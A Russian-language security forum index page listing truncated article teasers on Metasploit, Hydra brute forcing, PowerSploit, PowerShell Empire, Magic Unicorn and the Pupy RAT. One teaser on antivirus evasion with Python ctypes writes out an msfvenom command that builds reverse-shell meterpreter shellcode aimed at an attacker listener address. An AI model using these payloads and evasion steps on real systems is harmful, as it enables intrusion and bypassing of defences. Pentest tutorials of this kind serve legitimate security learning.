Форум информационной безопасности - Codeby.net

Soft Обзор свойств Metasploit Community

  • 3 332
  • 1

Этот раздел охватывает следующие темы:​
  • Обзор свойств
  • Панель инструментов
  • Навигационный обзор
  • Административный обзор
  • Обзор свойств
Обзор свойств Metasploit Community

Metasploit Community предоставляет полное и понятное рабочее пространство, которое вы можете использовать, как для выполнения административных заданий, так и для настройки тестов на проникновение.​

Панель инструментов...

Статья THC-Hydra инструкция для чайников

  • 35 645
  • 5
C
Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать файлы с именами и паролями, поскольку они поставляются вместе с программой.

ПРОТОКОЛ — это протокол, который вы хотите атаковать, например, ftp, smtp, http-get или любой из доступных: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP...

Статья Обзор Metasploit Community

  • 4 796
  • 0

Этот раздел охватывает следующие темы:
  • Обзор продукта
  • Компоненты Metasploit Community
  • Службы Listener
  • Реализация Metasploit
  • Общая терминология Metasploit
  • Рабочий процесс Metasploit
  • Поддерживаемые браузеры
  • Поддержка целей IPv6
Обзор продукта Metasploit Community

Metasploit Community – комплексный эксплуатационный инструмент, который помогает вам разделить поток пентестинга на меньшие и более управляемые задачи. При помощи Metasploit Community вы можете использовать силу Фреймворка Metasploit и базу данных его эксплойтов через...​

Статья Metasploit Community – руководство пользователя

  • 10 562
  • 0
Перевод: Анна Давыдова
Источник:
Оглавление
Целевая аудитория
Структура
Условные обозначения
Поддержка
Поддержка Metasploit Pro и Metasploit Express
Поддержка Metasploit фреймворк и Metasploit Community​
Обзор продукта
Компоненты Metasploit Community

Фреймворк Metasploit
Сервисы
Модули
Интерфейс пользователя​
Службы Listener
Реализация Metasploit
Общая терминология Metasploit

База данных
Расширенное сканирование
Эксплойт
Listener
Meterpreter
Модуль
Пэйлоад
Проект
Шелл
Код шелл
Цель
Задача
Уязвимость​
...

PowerShell для хакера (часть I )

  • 31 268
  • 50
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы...

Статья Знакомство с PowerShell Empire Framework

  • 45 975
  • 93
И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)...

Статья Обход антивируса с помощью ctypes (python)

  • 10 276
  • 8
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.

Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))

Вообщем ближе к делу

И так проделываем следующие шаги:
1)Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
2.jpg

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не...

Статья Быстрый способ получить meterpreter

  • 36 580
  • 33
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
1.png

Запускаем.Смотрим help.
2.jpg

Выполняем команду
Код:
python unicorn.py...

PUPY Remote Administration Tool (RAT)

  • 13 780
  • 24
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework...